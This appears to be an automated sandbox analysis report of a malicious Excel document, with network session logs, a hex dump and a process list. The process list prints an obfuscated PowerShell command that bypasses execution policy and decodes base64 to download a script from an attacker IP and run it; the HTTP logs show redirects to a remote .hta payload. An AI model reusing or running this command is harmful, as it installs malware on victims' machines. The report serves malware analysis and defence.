                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                x-ms-middleware-request-id: 00000000-0000-0000-0000-000000000000
                                                                X-DNS-Prefetch-Control: off
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Download-Options: noopen
                                                                X-Content-Type-Options: nosniff
                                                                X-XSS-Protection: 1; mode=block
                                                                Content-Security-Policy: default-src 'self' 'unsafe-inline' ; font-src *;img-src * data:; script-src * 'unsafe-inline' ; style-src * 'unsafe-inline';
                                                                Referrer-Policy: strict-origin
                                                                Permissions-Policy: accelerometer=(self), ambient-light-sensor=(), battery=(self), camera=(self), geolocation=(self), gyroscope=(self), microphone=(self), usb=(self), gamepad=(), speaker-selection=()
                                                                X-GoCache-CacheStatus: BYPASS
                                                                2024-12-13 16:48:12 UTC112INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 32 33 2e 39 35 2e 32 33 35 2e 32 39 2f 31 31 38 2f 73 75 70 2f 67 72 65 61 74 6e 69 63 65 66 65 61 74 75 72 65 73 77 69 74 68 73 75 70 65 72 63 6f 64 65 62 6e 61 74 75 72 61 6c 74 68 69 6e 67 73 69 6e 6c 69 6e 65 66 6f 72 67 69 76 65 6e 2e 68 74 61
                                                                Data Ascii: Found. Redirecting to http://23.95.235.29/118/sup/greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.hta


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.2249168170.82.173.304433288C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                TimestampBytes transferredDirectionData
                                                                2024-12-13 16:48:28 UTC426OUTGET /VRidcbrtv4?&helium=earsplitting&pasta=verdant&mirror=x-rated&gap=brash&life=fluffy&veranda HTTP/1.1
                                                                Accept: */*
                                                                UA-CPU: AMD64
                                                                Accept-Encoding: gzip, deflate
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                Host: curt.wiz.co
                                                                Connection: Keep-Alive
                                                                Cookie: sess=123
                                                                2024-12-13 16:48:29 UTC987INHTTP/1.1 302 Found
                                                                Date: Fri, 13 Dec 2024 16:48:29 GMT
                                                                Content-Type: text/plain; charset=utf-8
                                                                Content-Length: 112
                                                                Connection: close
                                                                Set-Cookie: sess=123; path=/; Secure; HttpOnly
                                                                Location: http://23.95.235.29/118/sup/greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.hta
                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                x-ms-middleware-request-id: 00000000-0000-0000-0000-000000000000
                                                                X-DNS-Prefetch-Control: off
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Download-Options: noopen
                                                                X-Content-Type-Options: nosniff
                                                                X-XSS-Protection: 1; mode=block
                                                                Content-Security-Policy: default-src 'self' 'unsafe-inline' ; font-src *;img-src * data:; script-src * 'unsafe-inline' ; style-src * 'unsafe-inline';
                                                                Referrer-Policy: strict-origin
                                                                Permissions-Policy: accelerometer=(self), ambient-light-sensor=(), battery=(self), camera=(self), geolocation=(self), gyroscope=(self), microphone=(self), usb=(self), gamepad=(), speaker-selection=()
                                                                X-GoCache-CacheStatus: BYPASS
                                                                2024-12-13 16:48:29 UTC112INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 32 33 2e 39 35 2e 32 33 35 2e 32 39 2f 31 31 38 2f 73 75 70 2f 67 72 65 61 74 6e 69 63 65 66 65 61 74 75 72 65 73 77 69 74 68 73 75 70 65 72 63 6f 64 65 62 6e 61 74 75 72 61 6c 74 68 69 6e 67 73 69 6e 6c 69 6e 65 66 6f 72 67 69 76 65 6e 2e 68 74 61
                                                                Data Ascii: Found. Redirecting to http://23.95.235.29/118/sup/greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.hta


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                3192.168.2.2249172170.82.174.304432772C:\Windows\System32\mshta.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-12-13 16:48:33 UTC432OUTGET /VRidcbrtv4?&helium=earsplitting&pasta=verdant&mirror=x-rated&gap=brash&life=fluffy&veranda HTTP/1.1
                                                                Accept: */*
                                                                Accept-Language: fr-FR
                                                                UA-CPU: AMD64
                                                                Accept-Encoding: gzip, deflate
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                Host: curt.wiz.co
                                                                Connection: Keep-Alive
                                                                2024-12-13 16:48:34 UTC987INHTTP/1.1 302 Found
                                                                Date: Fri, 13 Dec 2024 16:48:34 GMT
                                                                Content-Type: text/plain; charset=utf-8
                                                                Content-Length: 112
                                                                Connection: close
                                                                Set-Cookie: sess=123; path=/; Secure; HttpOnly
                                                                Location: http://23.95.235.29/118/sup/greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.hta
                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                x-ms-middleware-request-id: 00000000-0000-0000-0000-000000000000
                                                                X-DNS-Prefetch-Control: off
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Download-Options: noopen
                                                                X-Content-Type-Options: nosniff
                                                                X-XSS-Protection: 1; mode=block
                                                                Content-Security-Policy: default-src 'self' 'unsafe-inline' ; font-src *;img-src * data:; script-src * 'unsafe-inline' ; style-src * 'unsafe-inline';
                                                                Referrer-Policy: strict-origin
                                                                Permissions-Policy: accelerometer=(self), ambient-light-sensor=(), battery=(self), camera=(self), geolocation=(self), gyroscope=(self), microphone=(self), usb=(self), gamepad=(), speaker-selection=()
                                                                X-GoCache-CacheStatus: BYPASS
                                                                2024-12-13 16:48:34 UTC112INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 32 33 2e 39 35 2e 32 33 35 2e 32 39 2f 31 31 38 2f 73 75 70 2f 67 72 65 61 74 6e 69 63 65 66 65 61 74 75 72 65 73 77 69 74 68 73 75 70 65 72 63 6f 64 65 62 6e 61 74 75 72 61 6c 74 68 69 6e 67 73 69 6e 6c 69 6e 65 66 6f 72 67 69 76 65 6e 2e 68 74 61
                                                                Data Ascii: Found. Redirecting to http://23.95.235.29/118/sup/greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.hta


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                4192.168.2.2249174151.101.193.1374432648C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-12-13 16:48:47 UTC127OUTGET /dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg HTTP/1.1
                                                                Host: res.cloudinary.com
                                                                Connection: Keep-Alive
                                                                2024-12-13 16:48:48 UTC833INHTTP/1.1 200 OK
                                                                Connection: close
                                                                Content-Length: 2469849
                                                                Content-Type: image/jpeg
                                                                Etag: "78bd258abedd7787714b5d9c33eb9212"
                                                                Last-Modified: Fri, 13 Dec 2024 00:49:52 GMT
                                                                Date: Fri, 13 Dec 2024 16:48:48 GMT
                                                                Strict-Transport-Security: max-age=604800
                                                                Cache-Control: public, no-transform, immutable, max-age=2592000
                                                                Server-Timing: cld-fastly;dur=201;cpu=89;start=2024-12-13T16:48:48.055Z;desc=miss,rtt;dur=169,content-info;desc="width=1920,height=1080,bytes=2469849,format=\"jpg\",o=1,crt=1734050991,ef=(17)",cloudinary;dur=99;start=2024-12-13T16:48:48.149Z
                                                                Server: Cloudinary
                                                                Timing-Allow-Origin: *
                                                                Access-Control-Allow-Origin: *
                                                                Accept-Ranges: bytes
                                                                X-Content-Type-Options: nosniff
                                                                Access-Control-Expose-Headers: Content-Length,ETag,Server-Timing,X-Content-Type-Options
                                                                x-request-id: fdecdd9b808625f2ef998baba5084d1b
                                                                2024-12-13 16:48:48 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                2024-12-13 16:48:48 UTC1378INData Raw: 77 24 91 80 f7 ed aa 38 13 c5 74 2e 92 f9 a4 19 c0 50 c1 95 13 cc f4 aa d7 4f e2 f4 f6 cf 9a 34 12 6a 34 d1 ac 34 c0 35 95 3d b3 e9 ff 00 b5 df 0d 9e 5f 16 d1 c2 37 3c 8c ae 62 55 46 b2 4b 70 2d 85 9e 48 cf 03 04 29 1a 02 c8 cb 27 e1 22 e8 8f 87 f3 c0 63 45 08 87 48 b1 94 0b b9 a8 91 99 9a b8 22 87 5d 10 0c cd 1b b7 a8 92 00 02 e8 d6 6a e9 8a 5b 07 65 52 c0 a8 46 37 fa 62 5a 9d 3c 47 59 18 29 b4 1d c3 d2 47 3f 4c 09 9f 4f a7 74 d3 90 78 2c c0 37 bf 3c 73 8a 10 92 a8 46 da b2 2c 8a a8 77 71 9b 83 4e 8f 0a 82 ab ed c1 ac ce 7f 04 8d 35 22 50 e5 08 6b aa b1 81 68 b5 2c ec eb e5 80 55 14 32 31 a5 53 75 63 e7 97 d6 cd 1e a2 6d 36 91 ee de 4f 55 76 14 79 07 0b 2b 22 ef 72 88 c0 2f a9 8a 8e 6b 31 f4 8c da ed 7c d2 10 5c 85 3b 2c d5 0a 23 a6 06 b8 8b 6f 90 b0 bc
                                                                Data Ascii: w$8t.PO4j445=_7<bUFKp-H)'"cEH"]j[eRF7bZ<GY)G?LOtx,7<sF,wqN5"Pkh,U21Sucm6OUvy+"r/k1|\;,#o
                                                                2024-12-13 16:48:48 UTC1378INData Raw: 8c cd 80 06 22 88 00 fb 74 c5 c6 89 f4 fe 2d 26 ab ef 2f e5 b0 1e 8a 15 d3 03 7b ef a3 82 6d 4f 7c 20 f1 02 0b 6d 76 25 85 73 99 62 5f 34 d8 1c 7b e1 83 10 a3 8a b3 d7 01 8d 66 a0 49 0c 6a 5b 68 dc c7 75 e1 74 7a 92 cc 1f 71 de be 96 e6 f7 0f 7c c8 f1 3d 3b 6a 61 8e 38 e5 68 88 53 ea 51 cd e4 69 8b 69 b6 02 ec e5 68 59 ea 78 eb 81 ea 25 9c b2 90 2b 69 19 91 39 68 a6 8e 4d 96 a1 83 30 63 c6 30 9a 85 d8 ac 59 55 5b 81 67 92 71 2f 14 95 e6 85 a2 86 89 65 2a 6b b5 e0 6a 45 e2 ed 26 a4 45 1f aa 31 d4 a9 e0 1f 6c cd 97 c4 4b c9 2b 9e 77 31 20 fd 71 4d 32 2f 84 e8 00 6d cc e7 80 7b 9f 8e 27 14 ca fc 0f c3 cf 24 60 3a 67 91 e4 34 0b 1a be b9 07 54 77 8b e0 11 ef df 04 93 a2 2b 51 f5 1e 2b e1 99 7a 9d 2e ac 78 92 ce 35 2d f7 72 2b cb a1 5f 3c 0d 4d 46 b0 24 43 7b
                                                                Data Ascii: "t-&/{mO| mv%sb_4{fIj[hutzq|=;ja8hSQiihYx%+i9hM0c0YU[gq/e*kjE&E1lK+w1 qM2/m{'$`:g4Tw+Q+z.x5-r+_<MF$C{
                                                                2024-12-13 16:48:48 UTC1378INData Raw: 66 6d 4b f8 66 a7 61 05 96 26 b5 23 f1 70 73 f3 be ae 35 fb ac f2 15 01 99 ef 9e a3 9e d9 f5 ef 18 fb 5d a0 0b 26 92 09 a3 77 64 65 26 fe 07 fe bf ae 7c 9f 57 2c 6f e1 f2 21 70 ae ac 0d 7b e0 62 6c 20 6e 07 80 31 dd 33 bb 44 39 b3 7c 83 8a 79 8d b8 86 e0 1e 31 9d 15 14 65 07 a6 03 88 18 2d 95 5e 72 e2 32 ca 6d 45 1c ac a8 16 35 3b e8 8c a9 d4 24 41 44 8e 59 8f 4e 0e 01 3c b5 58 f6 8b 5a 3c 57 4c 80 be e2 fe 63 38 92 e0 90 f4 3a d6 5c be c4 0e ce 02 81 f9 e0 42 26 e0 56 94 1f 6c 23 82 aa 2d 54 0d c4 8f 8e 29 06 b5 25 76 51 e8 3d af be 32 1d 5c 6d 2c 09 1d f0 0f 13 72 3a 7d 71 b5 72 07 52 7e 03 33 d0 d6 da 3c f7 c6 44 6b d2 46 56 37 55 7d 0e 01 0c 8f 24 8a 63 ba f6 03 bf b6 3a 74 d3 3c 51 3c 60 33 49 b7 d3 e9 0c 2f a1 da 1b 77 36 39 34 39 1e f9 5d 14 f0 e9
                                                                Data Ascii: fmKfa&#ps5]&wde&|W,o!p{bl n13D9|y1e-^r2mE5;$ADYN<XZ<WLc8:\B&Vl#-T)%vQ=2\m,r:}qrR~3<DkFV7U}$c:t<Q<`3I/w6949]
                                                                2024-12-13 16:48:48 UTC1378INData Raw: 02 f2 41 e0 62 ed a9 02 44 70 8a c0 0b 66 63 c8 f9 65 03 79 a4 21 b2 3a 71 db 03 2e c8 9c 24 7b 9a fa fc 06 07 ba 3a c5 79 3c b6 3b 59 7b 91 f8 be 58 b6 b4 02 37 6d e7 bf c7 25 cd 2d 06 2c 3f 17 06 b1 43 36 d6 28 cc d4 dc 82 47 4f ae 00 1d 03 03 e9 c0 ec 01 b6 ed e9 8e 05 3b 6a ab db e3 95 f2 8b 03 5c 0e f8 0b 30 55 21 42 96 63 d1 47 7c 22 e8 dc 95 79 9d ae ec 20 6e 07 cf 0e a8 ab ca a5 03 d0 e5 e2 47 67 a2 2e b0 07 20 26 43 e9 ed c7 1f d7 2a 51 c2 9b 5e b8 47 23 71 04 51 ca 16 24 71 80 22 18 70 16 b2 e8 8c 48 39 60 bc d0 be 7a d6 6a 78 57 86 2e b9 a5 56 b5 0a bf 89 7a 86 c0 48 0f 49 17 47 2b b5 98 10 1b 93 c0 cf 56 3c 0f 47 c3 04 90 81 41 bd 46 c9 ae bc 63 71 e8 74 b1 a8 03 4d 18 ae fb 45 fe 67 03 c2 18 66 d3 b5 14 60 4f 3e ae f9 74 0c ec 41 5c f7 6f a7
                                                                Data Ascii: AbDpfcey!:q.${:y<;Y{X7m%-,?C6(GO;j\0U!BcG|"y nGg. &C*Q^G#qQ$q"pH9`zjxW.VzHIG+V<GAFcqtMEgf`O>tA\o
                                                                2024-12-13 16:48:48 UTC1378INData Raw: f1 15 94 48 14 8d b6 ca df a7 03 e9 f1 cc df b0 9a 89 a3 d3 7d a7 48 0c aa 4f 84 33 7a 05 9a 12 c4 39 ae db 49 07 e1 78 6f b5 a3 56 df b4 cd 42 6a db 6c ad a8 85 db 71 e8 19 51 81 f8 0a 38 1e fb ed 9c ba 65 d2 cd f6 82 49 4c da 88 d8 68 f4 fb a3 2c b1 f9 91 ee 2f 67 f1 10 a1 80 1d 8b 03 db 3e 6f a5 7d 2b 49 12 ef 8d 83 7e 0e 3a 8a 24 9e 9c 1f 7f 9e 7b 5f da 44 2f a0 f0 ff 00 0d 48 24 46 1a ad 05 36 c4 5a 71 4a 40 aa e7 9a e7 3e 65 f7 7d 42 08 d6 35 7a f2 dd 94 dd 6d 62 bd 30 35 27 d2 46 65 8a 40 54 aa 93 60 8b fd 30 5e 46 98 ea 15 46 9d 41 55 2d c8 a1 f9 74 c4 92 09 9f 4c c3 d4 a4 44 a1 94 25 7a 87 23 a9 e4 f1 97 58 35 0d 34 6e c8 f4 ec 25 2c 79 da 45 d0 fc ab 03 61 20 d3 6d dd b1 16 bd 94 56 56 5d 3e 92 65 37 1a 5d 75 0b 99 9a 6d 43 a4 c1 0e 9a c9 dc 4b
                                                                Data Ascii: H}HO3z9IxoVBjlqQ8eILh,/g>o}+I~:${_D/H$F6ZqJ@>e}B5zmb05'Fe@T`0^FFAU-tLD%z#X54n%,yEa mVV]>e7]umCK
                                                                2024-12-13 16:48:48 UTC1378INData Raw: 0f 38 48 fe dc e9 54 9b 82 4d fd 58 12 28 e7 cf e7 79 21 87 cc 2e ca e0 72 a8 2f 13 89 e4 d5 5b c6 ee 48 fc 4a c2 b0 3d e6 a7 ed f6 98 ea 3f 79 a6 90 83 de c0 c9 3f 6c 74 82 88 d3 b8 53 ec dc e7 cf a5 47 2d be 6b bb a0 06 3f 04 cd 0a 82 f0 2c 8a dc 0d d8 1e b9 be da e9 18 d7 95 29 3d bd 57 94 7f b7 3a 54 50 7e eb 2b 3d 55 93 9e 6a 2d 56 9b 54 ac 53 49 12 95 34 48 26 ef 17 95 d7 cc 56 11 2f c4 73 c6 07 a8 9b ed f6 8a 14 2c 74 ce 1a ba 6e ac cb f0 9f b5 be 11 e1 d3 4b 20 4d 43 bc c7 73 6e 6b 0a 7d 80 ac cd 30 69 b5 3e 96 d2 a3 12 3f 10 ea 33 16 5f 04 d4 0d 63 46 8b 69 d4 37 41 81 bf e3 9f 6c e5 d4 f8 a4 53 78 74 af 0c 51 0d db 4d 90 cd ec 46 7a 78 be de e8 bc a5 59 f4 ec d2 6c 05 88 60 05 9f 60 73 c1 41 e0 b1 23 7e f8 b3 f1 cf 6a 39 a9 f7 7d 24 6a 0b a0 07
                                                                Data Ascii: 8HTMX(y!.r/[HJ=?y?ltSG-k?,)=W:TP~+=Uj-VTSI4H&V/s,tnK MCsnk}0i>?3_cFi7AlSxtQMFzxYl``sA#~j9}$j
                                                                2024-12-13 16:48:48 UTC1378INData Raw: 93 c3 b9 dc ee 49 76 31 34 6a b8 dc 05 11 d7 8b bc 70 f8 b6 92 49 de 46 2e 1e 55 62 e4 a2 90 58 83 c9 1d f8 24 59 b3 de f3 0e 69 7c cd a2 ec 2a 95 51 55 42 c9 fa f5 38 17 95 15 a4 31 a2 aa b2 83 6b 1d 91 c5 d9 b2 7d b2 da 77 31 22 d4 65 b7 b1 50 7d c8 af ee 30 63 51 21 05 4b 02 0d d9 2a 09 e7 ad 1a b1 91 1c 92 aa 00 ad 41 4e e0 3d 8f 1f db 01 89 35 3b c0 20 15 db de f0 6f a9 56 75 76 dc 48 ed bb 8c 08 5b 4a 17 7d f9 ca 88 49 e2 f9 18 1a 03 c4 23 6b 26 3e a2 b2 24 d6 c3 22 14 64 b1 ef ed 88 84 29 76 39 ca bd 12 08 bf cb 00 a4 c2 14 98 d5 83 0e 84 9c 9d 36 a5 e0 63 42 c9 e7 9c 18 e0 82 47 07 2c 14 16 14 d5 f0 ac 0d 24 f1 5d a4 03 18 2f ee 33 6b 47 ad d3 3e 98 4d 26 91 19 99 d9 77 32 b9 ae 9e a2 43 00 33 ca 86 52 de ae 08 03 9c 29 21 94 85 5e 2a b8 e3 eb d7
                                                                Data Ascii: Iv14jpIF.UbX$Yi|*QUB81k}w1"eP}0cQ!K*AN=5; oVuvH[J}I#k&>$"d)v96cBG,$]/3kG>M&w2C3R)!^*
                                                                2024-12-13 16:48:48 UTC1378INData Raw: 55 78 17 d8 df cf 2b 2c 4e 80 47 2a b5 05 dd 83 d3 29 55 65 55 65 1b 88 c0 d0 66 49 22 dc ae c1 81 be 17 8e 98 b8 77 8c 15 90 2d 6e ea 32 88 5e 32 40 1b ab 2a 25 32 69 64 0c c3 75 1f cc 74 c0 b4 00 44 43 48 3d 24 9e be d9 57 87 73 82 09 b3 d6 b1 53 aa 77 34 e4 5d 03 47 e5 93 f7 c4 14 49 da 40 2a 7e 3f 96 07 ad 79 e3 61 bd 4e d0 7b e4 95 8a 45 b0 c5 8f c3 02 ba 33 cb 53 00 3b 9c 80 42 b1 3b b9 f9 60 18 ce aa 42 b2 86 1d 2c 76 f9 e3 0e ab 40 03 c5 70 31 00 f6 a4 48 6a fa 1d b8 cc 2f e7 00 a5 a9 94 58 f8 8c 0e 24 5d 61 13 77 6b 03 e1 92 17 af 1f 8b 8b c9 29 b5 49 1f 2c 00 18 b9 2d 6c 4f c7 28 47 15 75 86 08 42 f2 6b 2a c9 e9 3e bc 08 42 03 02 af 44 f7 ba cd 6f 04 d6 47 a2 d4 4a f3 be d5 70 2b 82 6d be 99 8e 14 03 f8 ac e1 01 2b d3 ad 7b d6 07 a4 f1 bd 8b 0a
                                                                Data Ascii: Ux+,NG*)UeUefI"w-n2^2@*%2idutDCH=$WsSw4]GI@*~?yaN{E3S;B;`B,v@p1Hj/X$]awk)I,-lO(GuBk*>BDoGJp+m+{
                                                                2024-12-13 16:48:48 UTC1378INData Raw: 20 86 62 6f b7 53 95 e9 c1 c0 bc 8f be be 19 5d c4 8a ed 90 7e 1d 32 39 c0 90 48 37 9c 4d 9c e1 d7 9e 99 6a 5f 2e ef d5 7d 3e 18 10 8a 5d c2 8e a7 8c 69 34 c5 24 56 24 30 0d 46 b1 55 b1 ea 1d 46 31 16 a9 92 68 d9 85 aa 90 6b 01 c1 a3 1f 78 16 c0 03 ea 1c d1 c0 ea a1 47 d4 b2 c6 e2 c0 b3 63 fa e0 66 d4 34 f3 16 51 42 c9 03 28 ac 03 31 65 dc 4f 7f 6c 06 e7 83 7e 99 69 cb 32 f7 6e ff 00 2c 5a 39 4a c0 e9 cd 9e 38 cd 24 4f 37 40 10 47 6c 3a 1f ae 27 36 92 58 80 97 69 00 1b 35 81 30 05 58 83 ca 01 00 f7 cf b2 7e cf b4 a9 3f ec fb 47 a6 9e 36 97 4f a8 fb 42 11 94 77 56 88 29 e7 b7 cf b6 7c 6a 58 19 c8 f2 eb 6d 73 66 8f 39 fa 1b f6 20 88 bf 60 e7 77 65 21 f5 ce 36 b3 71 7b 50 00 47 c4 d0 fa e0 7c f3 ec 86 96 0d 24 df 69 61 de cc 9f 72 5f 4c 4e 18 b2 99 62 23 d4
                                                                Data Ascii: boS]~29H7Mj_.}>]i4$V$0FUF1hkxGcf4QB(1eOl~i2n,Z9J8$O7@Gl:'6Xi50X~?G6OBwV)|jXmsf9 `we!6q{PG|$iar_LNb#


                                                                Click to jump to process

                                                                Click to jump to process

                                                                Click to dive into process behavior distribution

                                                                Click to jump to process

                                                                Target ID:0
                                                                Start time:11:47:41
                                                                Start date:13/12/2024
                                                                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                Imagebase:0x13f710000
                                                                File size:28'253'536 bytes
                                                                MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:4
                                                                Start time:11:48:07
                                                                Start date:13/12/2024
                                                                Path:C:\Windows\System32\mshta.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                Imagebase:0x13f4c0000
                                                                File size:13'824 bytes
                                                                MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:6
                                                                Start time:11:48:14
                                                                Start date:13/12/2024
                                                                Path:C:\Windows\System32\cmd.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\system32\cmd.exe" "/C pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"
                                                                Imagebase:0x4a170000
                                                                File size:345'088 bytes
                                                                MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:8
                                                                Start time:11:48:14
                                                                Start date:13/12/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUo